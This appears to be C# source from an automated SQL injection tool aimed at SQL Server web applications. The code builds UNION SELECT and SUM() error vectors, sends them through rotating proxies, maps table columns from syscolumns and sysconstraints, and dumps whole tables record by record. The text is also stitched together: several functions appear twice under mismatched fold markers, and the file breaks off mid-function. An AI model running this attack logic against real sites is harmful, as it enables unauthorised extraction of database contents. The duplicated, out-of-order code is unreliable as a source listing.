// }}} // {{{ ParseGroupedHaving
/// <summary>
/// Extracts the text that the server's error page places between the plugin's HAVING error
/// delimiters (the field name the database complained about when a GROUP BY clause was present).
/// </summary>
/// <param name="HTMLCode">Full HTML of the error page to scan.</param>
/// <param name="Plugin">Plugin supplying the delimiter strings HavingErrorPre, HavingErrorPost and HavingErrorPostWithGroupBy.</param>
/// <returns>
/// A field whose DataType is always SqlDbType.Variant and whose FieldName holds the extracted text,
/// or String.Empty when the delimiters are not both found in order.
/// </returns>
/// <remarks>
/// NOTE(review): the searches use the culture-sensitive string.IndexOf(string) overload;
/// behaviour is preserved here, but an ordinal search is what such delimiter matching normally wants.
/// </remarks>
public static GlobalDS.Field ParseGroupedHaving(string HTMLCode, IErrorPlugin Plugin)
{
    GlobalDS.Field field = new GlobalDS.Field();
    field.DataType = SqlDbType.Variant;
    field.FieldName = String.Empty;

    // Opening delimiter: nothing to extract when it is absent.
    string opener = Plugin.HavingErrorPre;
    int openerAt = HTMLCode.IndexOf(opener);
    if (openerAt < 0)
    {
        return field;
    }

    // Closing delimiter: fall back to the GROUP BY variant when the plain one is missing
    // or sits before the opener.
    int closerAt = HTMLCode.IndexOf(Plugin.HavingErrorPost);
    if (closerAt < openerAt)
    {
        closerAt = HTMLCode.IndexOf(Plugin.HavingErrorPostWithGroupBy);
    }

    if (closerAt > openerAt)
    {
        int dataStart = openerAt + opener.Length;
        field.FieldName = HTMLCode.Substring(dataStart, closerAt - dataStart);
    }
    return field;
}
/// <summary>
/// Looks up one column of a table in the SQL Server system catalog (syscolumns, then sysconstraints)
/// through the shared vector and maps the two answers onto a GlobalDS.Field.
/// </summary>
/// <param name="TableID">Object id of the table (matched against the catalog's id column).</param>
/// <param name="FieldID">Column id; the first query selects rows with colid greater than this value, the second the row with exactly this colid.</param>
/// <returns>Field with FieldName, DataType and IsPrimary populated from the responses.</returns>
/// <remarks>
/// Side effects: _AttackParams[_VectorName] is overwritten twice and two HTTP requests are issued via httpConnect.PageRequest.
/// Both select clauses handed to GeneralPurposeUnionTextSelect use char(58) (':') as a delimiter, which the parsing below relies on.
/// Monitoring note: the clauses reference the syscolumns and sysconstraints catalog views and carry the char(58) token;
/// neither is typical of ordinary application traffic.
/// Which of several matching rows the first query yields depends on GeneralPurposeUnionTextSelect, defined elsewhere.
/// </remarks>
private GlobalDS.Field GetFieldData(long TableID, int FieldID)
{
    GlobalDS.Field retVal = new GlobalDS.Field();
    StringBuilder WhereClause = new StringBuilder();
    WhereClause.Append("id=").Append(TableID).Append(" and colid > ").Append(FieldID);
    // First request: "name:xtype" for a column after FieldID.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("name + char(58)+convert(char,xtype)", "syscolumns", WhereClause.ToString());
    string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string PulledData = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
    // Split on the char(58) delimiter; values[1] throws IndexOutOfRangeException if no ':' came back.
    string[] values = PulledData.Split(':');
    retVal.FieldName = values[0];
    retVal.DataType = GetSqlDataType(Convert.ToInt64(values[1].Trim()));
    // Second request: ":status" from sysconstraints for exactly this column.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, status)", "sysconstraints", "id=" + TableID + " and colid=" + FieldID);
    ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    PulledData = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
    if (PulledData.Length > 0)
    {
        // Drop the leading ':'; bit 0 of the status value is taken as the primary-key flag.
        PulledData = PulledData.Substring(1, PulledData.Length - 1);
        retVal.IsPrimary = ((Convert.ToInt32(PulledData.Trim()) & 1) == 1);
    }
    return(retVal);
}
/// <summary>
/// First typing pass over _QueryStructure: for every entry, sends a vector of the form
/// "_VectorBuffer UNION SELECT SUM(FullName) FROM TableName--" and stores the DataType that
/// ParsePage.ParseUnionSumError derives from the resulting server error.
/// </summary>
/// <remarks>
/// Side effects: one HTTP request per entry; _AttackParams[_VectorName] is overwritten on each iteration.
/// Every vector is also echoed verbatim through UserStatus("hmm: ...") — leftover debug output.
/// Review note: the modified field is written back into _QueryStructure, which suggests GlobalDS.Field
/// is a value type — confirm before relying on that.
/// Monitoring note: the literal sequence " UNION SELECT SUM(" followed by "--" is a stable marker of this pass.
/// </remarks>
private void TypeCastAttackVector()
{
    StringBuilder CurrentVector = new StringBuilder();   // replaced on every iteration below
    for (int FieldCounter = 0; FieldCounter < _QueryStructure.Count; FieldCounter++)
    {
        UserStatus(String.Format("Counter is at {0} of {1}", FieldCounter, _QueryStructure.Count));
        CurrentVector = new StringBuilder();
        CurrentVector.Append(_VectorBuffer).Append(" UNION SELECT SUM(");
        CurrentVector.Append(((GlobalDS.Field)_QueryStructure[FieldCounter]).FullName);
        CurrentVector.Append(") FROM ");
        CurrentVector.Append(((GlobalDS.Field)_QueryStructure[FieldCounter]).TableName);
        CurrentVector.Append("--");
        _AttackParams[_VectorName] = CurrentVector.ToString();
        string ResultPage;
        // Debug echo of the full vector.
        UserStatus(String.Format("hmm: {0}", CurrentVector.ToString()));
        ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
        // Classify the field from the SUM() error and write the entry back.
        GlobalDS.Field dbg = (GlobalDS.Field)_QueryStructure[FieldCounter];
        dbg.DataType = ParsePage.ParseUnionSumError(ResultPage, _Plugin);
        // ## DEBUG
        UserStatus(String.Format("Resulting Data: {0} - {1}", dbg.FullName, dbg.DataType));
        _QueryStructure[FieldCounter] = dbg;
    }
    UserStatus("Finished Typecasting..");
}
/// <summary>
/// Second typing pass: for each index returned by FindAllVariInts, sends one UNION ALL SELECT whose
/// column list holds a placeholder per field, and replaces that field's DataType with what
/// ParsePage.ParseUnionSelectForIntegerRefinement reads from the response.
/// </summary>
/// <remarks>
/// Placeholders per position: char(0x61) for the position being refined and for VarChar/Char/NVarChar
/// fields, NULL for Text/NText/Variant fields, the literal 1 for everything else. The trailing comma is
/// removed and " ORDER BY 1--" appended before the vector is stored in _AttackParams[_VectorName].
/// Side effects: one HTTP request per refined index; the _QueryStructure entry is written back after each response.
/// FindAllVariInts is defined elsewhere; presumably it lists positions still typed as integer-like — confirm.
/// </remarks>
private void RefinedTypeCasting()
{
    StringBuilder CurrentVector = new StringBuilder();   // replaced on every iteration below
    List <int> IntList = FindAllVariInts(_QueryStructure);
    for (int IntCounter = 0; IntCounter < IntList.Count; IntCounter++)
    {
        UserStatus("Refining Integer #" + IntCounter);
        CurrentVector = new StringBuilder();
        CurrentVector.Append(_VectorBuffer).Append(" UNION ALL SELECT ");
        for (int FieldCounter = 0; FieldCounter < _QueryStructure.Count; FieldCounter++)
        {
            if (FieldCounter == (int)IntList[IntCounter]
                || ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.VarChar
                || ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.Char
                || ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.NVarChar)
            {
                // Single-character string placeholder (0x61 is ASCII 'a').
                CurrentVector.Append("char(0x61),");
            }
            // Text, NText and Variant positions get NULL instead of a typed placeholder.
            else if (((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.Text
                || ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.NText
                || ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.Variant)
            {
                CurrentVector.Append("NULL,");
            }
            else
            {
                UserStatus(String.Format("Refining {0}", ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType));
                CurrentVector.Append("1,");
            }
        }
        // Remove the trailing comma left by the last placeholder.
        CurrentVector.Remove(CurrentVector.Length - 1, 1);
        CurrentVector.Append(" ORDER BY 1--");
        _AttackParams[_VectorName] = CurrentVector.ToString();
        string ResultPage;
        ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
        // Refine the type of the selected position and write the entry back.
        GlobalDS.Field AdjustedField = (GlobalDS.Field)_QueryStructure[(int)IntList[IntCounter]];
        AdjustedField.DataType = ParsePage.ParseUnionSelectForIntegerRefinement(ResultPage, _Plugin);
        _QueryStructure[(int)IntList[IntCounter]] = AdjustedField;
    }
    UserStatus("Finished Refining Typecasts");
}
/// <summary>
/// Rebuilds a SqlErrorAttackVector from its saved XML node.
/// </summary>
/// <param name="VectorNode">Node carrying optional "name" and "buffer" attributes and zero or more "entry" children.</param>
/// <param name="PluginUsed">Plugin handed through to the vector unchanged.</param>
/// <returns>A vector built from this instance's _TargetURL, _Method and _AttackParams plus the parsed entries.</returns>
/// <remarks>
/// Each entry yields one GlobalDS.Field: FieldName is "field" (prefixed with "table." when present) and is
/// left at its default when "field" is absent; DataType comes from System.Enum.Parse of "datatype", which
/// throws ArgumentException on a value that is not a SqlDbType name.
/// NOTE(review): the node is trusted as saved state; whether the document it came from was loaded with
/// DTD processing disabled is decided at the load site, not here — confirm there.
/// </remarks>
private SqlErrorAttackVector DeserializeSqlErrorAttackVectorXml(XmlNode VectorNode, IErrorPlugin PluginUsed)
{
    List<GlobalDS.Field> fields = new List<GlobalDS.Field>();
    // Iterating an empty node list is a no-op, so no Count guard is needed.
    foreach (XmlNode entry in VectorNode.SelectNodes("entry"))
    {
        GlobalDS.Field field = new GlobalDS.Field();
        XmlAttribute fieldAttr = entry.Attributes["field"];
        if (fieldAttr != null)
        {
            XmlAttribute tableAttr = entry.Attributes["table"];
            // Qualify as table.field when a table attribute accompanies the field.
            field.FieldName = tableAttr == null
                ? fieldAttr.InnerText
                : tableAttr.InnerText + "." + fieldAttr.InnerText;
        }
        XmlAttribute typeAttr = entry.Attributes["datatype"];
        if (typeAttr != null)
        {
            field.DataType = (SqlDbType)System.Enum.Parse(typeof(SqlDbType), typeAttr.InnerText);
        }
        fields.Add(field);
    }

    XmlAttribute nameAttr = VectorNode.Attributes["name"];
    XmlAttribute bufferAttr = VectorNode.Attributes["buffer"];
    string vectorName = nameAttr == null ? "" : nameAttr.InnerText;
    string vectorBuffer = bufferAttr == null ? "" : bufferAttr.InnerText;
    return new SqlErrorAttackVector(_TargetURL, _Method, fields, vectorName, vectorBuffer, _AttackParams, PluginUsed);
}
// }}} // {{{ PullDataFromIndividualTable
/// <summary>
/// Retrieves every record of SrcTable one primary-key value at a time, restricted to the columns whose
/// index appears in ColumnIDs, and writes each record to xOutput as soon as it is retrieved.
/// </summary>
/// <param name="SrcTable">Table whose FieldList, Name and RecordCount drive the walk.</param>
/// <param name="ColumnIDs">Indices into SrcTable.FieldList of the columns to retrieve.</param>
/// <param name="xOutput">Writer that receives each record through OutputRecordToFile.</param>
/// <returns>All retrieved records; empty when no field is flagged IsPrimary (or the flagged field has an empty name).</returns>
/// <remarks>
/// Side effects: SrcTable.RecordCount calls to IteratePrimaryKey plus whatever GetRecord issues per record.
/// When several fields are flagged IsPrimary, the last one in FieldList wins.
/// ColumnList is sized from ColumnIDs.Length; ids that do not match a FieldList index leave trailing null entries.
/// </remarks>
private List <Hashtable> PullDataFromIndividualTable(GlobalDS.Table SrcTable, long[] ColumnIDs, ref XmlTextWriter xOutput)
{
    List <Hashtable> retVal = new List <Hashtable>();
    long RecordCounter = 0;
    GlobalDS.Field[] ColumnList = new GlobalDS.Field[ColumnIDs.Length];
    GlobalDS.PrimaryKey CurrentPrimaryKey = new GlobalDS.PrimaryKey();
    int ColumnCounter = 0;
    string PrimaryKeyName = String.Empty;
    SqlDbType PrimaryKeyType = SqlDbType.Int;
    UserStatus(String.Format("Individual Pulling {0}", SrcTable.Name));
    // Generate Field List: pick the requested columns and remember the primary key.
    for (long FieldCounter = 0; FieldCounter < SrcTable.FieldList.Length; FieldCounter++)
    {
        UserStatus(String.Format("Going for Field: {0}", SrcTable.FieldList[FieldCounter].FieldName));
        if (Array.IndexOf(ColumnIDs, FieldCounter) >= 0)
        {
            ColumnList[ColumnCounter] = SrcTable.FieldList[FieldCounter];
            ColumnCounter++;
        }
        if (SrcTable.FieldList[FieldCounter].IsPrimary)
        {
            PrimaryKeyName = SrcTable.FieldList[FieldCounter].FieldName;
            PrimaryKeyType = SrcTable.FieldList[FieldCounter].DataType;
        }
    }
    // Without a usable primary key there is nothing to iterate over.
    if (PrimaryKeyName.Length > 0)
    {
        for (RecordCounter = 0; RecordCounter < SrcTable.RecordCount; RecordCounter++)
        {
            CurrentPrimaryKey = IteratePrimaryKey(SrcTable.Name, PrimaryKeyName, CurrentPrimaryKey, PrimaryKeyType);
            Hashtable Record = GetRecord(SrcTable.Name, ColumnList, CurrentPrimaryKey);
            retVal.Add(Record);
            OutputRecordToFile(ref xOutput, Record, CurrentPrimaryKey);
        }
    }
    return(retVal);
}
// }}} // {{{ GetFieldData
/// <summary>
/// Retrieves the value of one column for the record identified by pk and returns it as a name/value pair.
/// </summary>
/// <param name="TableName">Table the column belongs to.</param>
/// <param name="Column">Column descriptor; its DataType selects the switch branch that builds the select clause.</param>
/// <param name="pk">Primary key (Name/Value) of the record being read.</param>
/// <returns>Key = Column.FieldName; Value = the retrieved text, or pk.Value when the column is the key itself.</returns>
/// <remarks>
/// Side effects: unless the column is the key, _AttackParams[_VectorName] is overwritten and one HTTP request is issued.
/// All three populated switch branches build the identical clause: the value wrapped in char(58) (':') on both
/// sides, which the final Substring strips. Image/Binary/VarBinary leave SelectClause empty and the request is
/// still sent; a response shorter than two characters makes that Substring throw ArgumentOutOfRangeException.
/// </remarks>
private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk)
{
    DictionaryEntry retVal = new DictionaryEntry();
    retVal.Key = Column.FieldName;
    retVal.Value = string.Empty;
    // The key column's value is already known; no request needed.
    if (Column.FieldName.Equals(pk.Name))
    {
        retVal.Value = pk.Value;
        return(retVal);
    }
    StringBuilder SelectClause = new StringBuilder();
    switch (Column.DataType)
    {
        case SqlDbType.BigInt:
        case SqlDbType.SmallInt:
        case SqlDbType.TinyInt:
        case SqlDbType.Int:
        case SqlDbType.Decimal:
        case SqlDbType.DateTime:
        case SqlDbType.Money:
        case SqlDbType.Float:
        case SqlDbType.Real:
        case SqlDbType.SmallDateTime:
        case SqlDbType.SmallMoney:
        case SqlDbType.Timestamp:
        case SqlDbType.UniqueIdentifier:
            // Earlier per-type path (OpenEndedIntegerSearch) has been replaced by the generic nvarchar conversion.
            SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
            break;
        case SqlDbType.NChar:
        case SqlDbType.Char:
        case SqlDbType.NVarChar:
        case SqlDbType.Text:
        case SqlDbType.NText:
        case SqlDbType.VarChar:
            // Same clause as the numeric branch.
            SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
            break;
        case SqlDbType.Bit:
            // Same clause as the numeric branch.
            SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
            break;
        case SqlDbType.Image:
        case SqlDbType.Binary:
        case SqlDbType.VarBinary:
            // TODO: binary types are not supported; SelectClause stays empty and the request below is still issued.
            break;
    }
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(SelectClause.ToString(), TableName, pk.Name + " = " + pk.Value);
    string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
    // Strip the leading and trailing ':' delimiters.
    retVal.Value = ResultText.Substring(1, ResultText.Length - 2);
    return(retVal);
}
/// <summary>
/// Loads the saved schema node into _Username, _AllTablesRetrieved and _DBTables.
/// </summary>
/// <param name="TargetNode">Node with optional "username" and "tablesfinished" attributes and "table" children, each with "field" children.</param>
/// <remarks>
/// A table is only kept when both its "name" and "id" attributes are present; "recordcount" is optional.
/// Field "datatype" is parsed with System.Enum.Parse and "primary" with bool.Parse; only the latter is
/// guarded (a malformed value yields false). Malformed "id", "recordcount", "tablesfinished" or "datatype"
/// values throw FormatException/ArgumentException out of this method, leaving _Username already overwritten.
/// When the node has no "table" children, _DBTables keeps its previous value.
/// NOTE(review): the node is trusted as saved state; whether its document was loaded with DTD processing
/// disabled is decided at the load site, not here — confirm there.
/// </remarks>
private void DeserializeSchemaXml(XmlNode TargetNode)
{
    // Reset the scalar members this node feeds before reading anything.
    _Username = "";
    _AllTablesRetrieved = true;

    XmlAttribute userAttr = TargetNode.Attributes["username"];
    if (userAttr != null)
    {
        _Username = userAttr.InnerText;
    }
    XmlAttribute finishedAttr = TargetNode.Attributes["tablesfinished"];
    if (finishedAttr != null)
    {
        _AllTablesRetrieved = bool.Parse(finishedAttr.InnerText);
    }

    XmlNodeList tableNodes = TargetNode.SelectNodes("table");
    if (tableNodes.Count == 0)
    {
        // No table children: _DBTables is left as it was.
        return;
    }

    List<GlobalDS.Table> parsedTables = new List<GlobalDS.Table>();
    foreach (XmlNode tableNode in tableNodes)
    {
        GlobalDS.Table table = new GlobalDS.Table();
        XmlAttribute nameAttr = tableNode.Attributes["name"];
        XmlAttribute idAttr = tableNode.Attributes["id"];
        if (nameAttr == null || idAttr == null)
        {
            // Both attributes are mandatory; incomplete tables are skipped.
            continue;
        }
        table.Name = nameAttr.InnerText;
        table.ObjectID = System.Int32.Parse(idAttr.InnerText);
        XmlAttribute countAttr = tableNode.Attributes["recordcount"];
        if (countAttr != null)
        {
            table.RecordCount = System.Int64.Parse(countAttr.InnerText);
        }

        foreach (XmlNode fieldNode in tableNode.SelectNodes("field"))
        {
            GlobalDS.Field field = new GlobalDS.Field();
            XmlAttribute fieldNameAttr = fieldNode.Attributes["name"];
            if (fieldNameAttr != null)
            {
                field.FieldName = fieldNameAttr.InnerText;
            }
            XmlAttribute typeAttr = fieldNode.Attributes["datatype"];
            if (typeAttr != null)
            {
                field.DataType = (System.Data.SqlDbType)System.Enum.Parse(typeof(System.Data.SqlDbType), typeAttr.InnerText);
            }
            XmlAttribute primaryAttr = fieldNode.Attributes["primary"];
            if (primaryAttr != null)
            {
                try
                {
                    field.IsPrimary = bool.Parse(primaryAttr.InnerText);
                }
                catch (System.FormatException)
                {
                    // A malformed flag is treated as "not primary".
                    field.IsPrimary = false;
                }
            }
            table.AddField(field);
        }
        parsedTables.Add(table);
    }
    _DBTables = parsedTables.ToArray();
}
// }}} // {{{ PullDataFromIndividualTable
/// <summary>
/// Retrieves every record of SrcTable one primary-key value at a time, restricted to the columns whose
/// index appears in ColumnIDs, and writes each record to xOutput as soon as it is retrieved.
/// </summary>
/// <param name="SrcTable">Table whose FieldList, Name and RecordCount drive the walk.</param>
/// <param name="ColumnIDs">Indices into SrcTable.FieldList of the columns to retrieve.</param>
/// <param name="xOutput">Writer that receives each record through OutputRecordToFile.</param>
/// <returns>All retrieved records; empty when no field is flagged IsPrimary (or the flagged field has an empty name).</returns>
/// <remarks>
/// Side effects: SrcTable.RecordCount calls to IteratePrimaryKey plus whatever GetRecord issues per record.
/// When several fields are flagged IsPrimary, the last one in FieldList wins.
/// ColumnList is sized from ColumnIDs.Length; ids that do not match a FieldList index leave trailing null entries.
/// </remarks>
private List<Hashtable> PullDataFromIndividualTable(GlobalDS.Table SrcTable, long[] ColumnIDs, ref XmlTextWriter xOutput)
{
    List<Hashtable> retVal = new List<Hashtable>();
    long RecordCounter = 0;
    GlobalDS.Field[] ColumnList = new GlobalDS.Field[ColumnIDs.Length];
    GlobalDS.PrimaryKey CurrentPrimaryKey = new GlobalDS.PrimaryKey();
    int ColumnCounter = 0;
    string PrimaryKeyName = String.Empty;
    SqlDbType PrimaryKeyType= SqlDbType.Int;
    UserStatus(String.Format("Individual Pulling {0}", SrcTable.Name));
    // Generate Field List: pick the requested columns and remember the primary key.
    for (long FieldCounter = 0; FieldCounter < SrcTable.FieldList.Length; FieldCounter++)
    {
        UserStatus(String.Format("Going for Field: {0}", SrcTable.FieldList[FieldCounter].FieldName));
        if (Array.IndexOf(ColumnIDs, FieldCounter) >= 0)
        {
            ColumnList[ColumnCounter] = SrcTable.FieldList[FieldCounter];
            ColumnCounter++;
        }
        if (SrcTable.FieldList[FieldCounter].IsPrimary)
        {
            PrimaryKeyName = SrcTable.FieldList[FieldCounter].FieldName;
            PrimaryKeyType = SrcTable.FieldList[FieldCounter].DataType;
        }
    }
    // Without a usable primary key there is nothing to iterate over.
    if (PrimaryKeyName.Length > 0)
    {
        for (RecordCounter = 0; RecordCounter < SrcTable.RecordCount; RecordCounter++)
        {
            CurrentPrimaryKey = IteratePrimaryKey(SrcTable.Name, PrimaryKeyName, CurrentPrimaryKey, PrimaryKeyType);
            Hashtable Record = GetRecord(SrcTable.Name, ColumnList, CurrentPrimaryKey);
            retVal.Add(Record);
            OutputRecordToFile(ref xOutput, Record, CurrentPrimaryKey);
        }
    }
    return retVal;
}
/// <summary>
/// Looks up one column of a table in the SQL Server system catalog (syscolumns, then sysconstraints)
/// through the shared vector and maps the two answers onto a GlobalDS.Field.
/// </summary>
/// <param name="TableID">Object id of the table (matched against the catalog's id column).</param>
/// <param name="FieldID">Column id; the first query selects rows with colid greater than this value, the second the row with exactly this colid.</param>
/// <returns>Field with FieldName, DataType and IsPrimary populated from the responses.</returns>
/// <remarks>
/// Side effects: _AttackParams[_VectorName] is overwritten twice and two HTTP requests are issued via httpConnect.PageRequest.
/// Both select clauses handed to GeneralPurposeUnionTextSelect use char(58) (':') as a delimiter, which the parsing below relies on.
/// Monitoring note: the clauses reference the syscolumns and sysconstraints catalog views and carry the char(58) token;
/// neither is typical of ordinary application traffic.
/// Which of several matching rows the first query yields depends on GeneralPurposeUnionTextSelect, defined elsewhere.
/// </remarks>
private GlobalDS.Field GetFieldData(long TableID, int FieldID)
{
    GlobalDS.Field retVal = new GlobalDS.Field();
    StringBuilder WhereClause = new StringBuilder();
    WhereClause.Append("id=").Append(TableID).Append(" and colid > ").Append(FieldID);
    // First request: "name:xtype" for a column after FieldID.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("name + char(58)+convert(char,xtype)", "syscolumns", WhereClause.ToString());
    string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string PulledData = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
    // Split on the char(58) delimiter; values[1] throws IndexOutOfRangeException if no ':' came back.
    string[] values = PulledData.Split(':');
    retVal.FieldName = values[0];
    retVal.DataType = GetSqlDataType(Convert.ToInt64(values[1].Trim()));
    // Second request: ":status" from sysconstraints for exactly this column.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, status)", "sysconstraints", "id=" + TableID + " and colid=" + FieldID);
    ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    PulledData = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
    if (PulledData.Length > 0)
    {
        // Drop the leading ':'; bit 0 of the status value is taken as the primary-key flag.
        PulledData = PulledData.Substring(1, PulledData.Length -1);
        retVal.IsPrimary = ((Convert.ToInt32(PulledData.Trim()) & 1) == 1);
    }
    return retVal;
}
// }}} // {{{ ParseGroupedHaving
/// <summary>
/// Extracts the text that the server's error page places between the plugin's HAVING error
/// delimiters (the field name the database complained about when a GROUP BY clause was present).
/// </summary>
/// <param name="HTMLCode">Full HTML of the error page to scan.</param>
/// <param name="Plugin">Plugin supplying the delimiter strings HavingErrorPre, HavingErrorPost and HavingErrorPostWithGroupBy.</param>
/// <returns>
/// A field whose DataType is always SqlDbType.Variant and whose FieldName holds the extracted text,
/// or String.Empty when the delimiters are not both found in order.
/// </returns>
/// <remarks>
/// NOTE(review): the searches use the culture-sensitive string.IndexOf(string) overload;
/// behaviour is preserved here, but an ordinal search is what such delimiter matching normally wants.
/// </remarks>
public static GlobalDS.Field ParseGroupedHaving(string HTMLCode, IErrorPlugin Plugin)
{
    GlobalDS.Field result = new GlobalDS.Field();
    result.DataType = SqlDbType.Variant;
    result.FieldName = String.Empty;

    string preMarker = Plugin.HavingErrorPre;
    int preAt = HTMLCode.IndexOf(preMarker);
    if (preAt < 0)
    {
        // Opening delimiter absent: nothing to extract.
        return result;
    }

    // Prefer the plain closing delimiter; use the GROUP BY variant when the plain one is
    // missing or precedes the opener.
    int postAt = HTMLCode.IndexOf(Plugin.HavingErrorPost);
    if (postAt < preAt)
    {
        postAt = HTMLCode.IndexOf(Plugin.HavingErrorPostWithGroupBy);
    }

    if (postAt > preAt)
    {
        int dataStart = preAt + preMarker.Length;
        result.FieldName = HTMLCode.Substring(dataStart, postAt - dataStart);
    }
    return result;
}
/// <summary>
/// Builds a GlobalDS.Field for one column by resolving its name and data type and comparing
/// its id with the table's primary-key field id.
/// </summary>
/// <param name="FieldID">Column id to describe.</param>
/// <param name="TableID">Table the column belongs to.</param>
/// <param name="PrimaryKey">Field id of the table's primary key; IsPrimary is true when it equals FieldID.</param>
/// <returns>Field with FieldName, DataType and IsPrimary set.</returns>
/// <remarks>GetFieldName and GetFieldDataType are defined elsewhere and are called in that order.</remarks>
private GlobalDS.Field RetrieveField(long FieldID, long TableID, long PrimaryKey)
{
    string resolvedName = GetFieldName(FieldID, TableID);
    GlobalDS.Field field = new GlobalDS.Field();
    field.FieldName = resolvedName;
    field.DataType = GetFieldDataType(FieldID, TableID);
    field.IsPrimary = FieldID == PrimaryKey;
    return field;
}
/// <summary>
/// Rebuilds a SqlErrorAttackVector from its saved XML node.
/// </summary>
/// <param name="VectorNode">Node carrying optional "name" and "buffer" attributes and zero or more "entry" children.</param>
/// <param name="PluginUsed">Plugin handed through to the vector unchanged.</param>
/// <returns>A vector built from this instance's _TargetURL, _Method and _AttackParams plus the parsed entries.</returns>
/// <remarks>
/// Each entry yields one GlobalDS.Field: FieldName is "field" (prefixed with "table." when present) and is
/// left at its default when "field" is absent; DataType comes from System.Enum.Parse of "datatype", which
/// throws ArgumentException on a value that is not a SqlDbType name.
/// NOTE(review): the node is trusted as saved state; whether the document it came from was loaded with
/// DTD processing disabled is decided at the load site, not here — confirm there.
/// </remarks>
private SqlErrorAttackVector DeserializeSqlErrorAttackVectorXml(XmlNode VectorNode, IErrorPlugin PluginUsed)
{
    List<GlobalDS.Field> parsedFields = new List<GlobalDS.Field>();
    // Iterating an empty node list is a no-op, so no Count guard is needed.
    foreach (XmlNode entry in VectorNode.SelectNodes("entry"))
    {
        GlobalDS.Field field = new GlobalDS.Field();
        XmlAttribute fieldAttr = entry.Attributes["field"];
        if (fieldAttr != null)
        {
            XmlAttribute tableAttr = entry.Attributes["table"];
            // Qualify as table.field when a table attribute accompanies the field.
            field.FieldName = tableAttr == null
                ? fieldAttr.InnerText
                : tableAttr.InnerText + "." + fieldAttr.InnerText;
        }
        XmlAttribute typeAttr = entry.Attributes["datatype"];
        if (typeAttr != null)
        {
            field.DataType = (SqlDbType)System.Enum.Parse(typeof(SqlDbType), typeAttr.InnerText);
        }
        parsedFields.Add(field);
    }

    XmlAttribute nameAttr = VectorNode.Attributes["name"];
    XmlAttribute bufferAttr = VectorNode.Attributes["buffer"];
    string vectorName = nameAttr == null ? "" : nameAttr.InnerText;
    string vectorBuffer = bufferAttr == null ? "" : bufferAttr.InnerText;
    return new SqlErrorAttackVector(_TargetURL, _Method, parsedFields, vectorName, vectorBuffer, _AttackParams, PluginUsed);
}
/// <summary>
/// Loads the saved schema node into _Username, _AllTablesRetrieved and _DBTables.
/// </summary>
/// <param name="TargetNode">Node with optional "username" and "tablesfinished" attributes and "table" children, each with "field" children.</param>
/// <remarks>
/// A table is only kept when both its "name" and "id" attributes are present; "recordcount" is optional.
/// Field "datatype" is parsed with System.Enum.Parse and "primary" with bool.Parse; only the latter is
/// guarded (a malformed value yields false). Malformed "id", "recordcount", "tablesfinished" or "datatype"
/// values throw FormatException/ArgumentException out of this method, leaving _Username already overwritten.
/// When the node has no "table" children, _DBTables keeps its previous value.
/// NOTE(review): the node is trusted as saved state; whether its document was loaded with DTD processing
/// disabled is decided at the load site, not here — confirm there.
/// </remarks>
private void DeserializeSchemaXml(XmlNode TargetNode)
{
    // Reset the scalar members this node feeds before reading anything.
    _Username = "";
    _AllTablesRetrieved = true;

    XmlAttribute userAttr = TargetNode.Attributes["username"];
    if (userAttr != null)
    {
        _Username = userAttr.InnerText;
    }
    XmlAttribute finishedAttr = TargetNode.Attributes["tablesfinished"];
    if (finishedAttr != null)
    {
        _AllTablesRetrieved = bool.Parse(finishedAttr.InnerText);
    }

    XmlNodeList tableNodes = TargetNode.SelectNodes("table");
    if (tableNodes.Count == 0)
    {
        // No table children: _DBTables is left as it was.
        return;
    }

    List<GlobalDS.Table> parsedTables = new List<GlobalDS.Table>();
    foreach (XmlNode tableNode in tableNodes)
    {
        GlobalDS.Table table = new GlobalDS.Table();
        XmlAttribute nameAttr = tableNode.Attributes["name"];
        XmlAttribute idAttr = tableNode.Attributes["id"];
        if (nameAttr == null || idAttr == null)
        {
            // Both attributes are mandatory; incomplete tables are skipped.
            continue;
        }
        table.Name = nameAttr.InnerText;
        table.ObjectID = System.Int32.Parse(idAttr.InnerText);
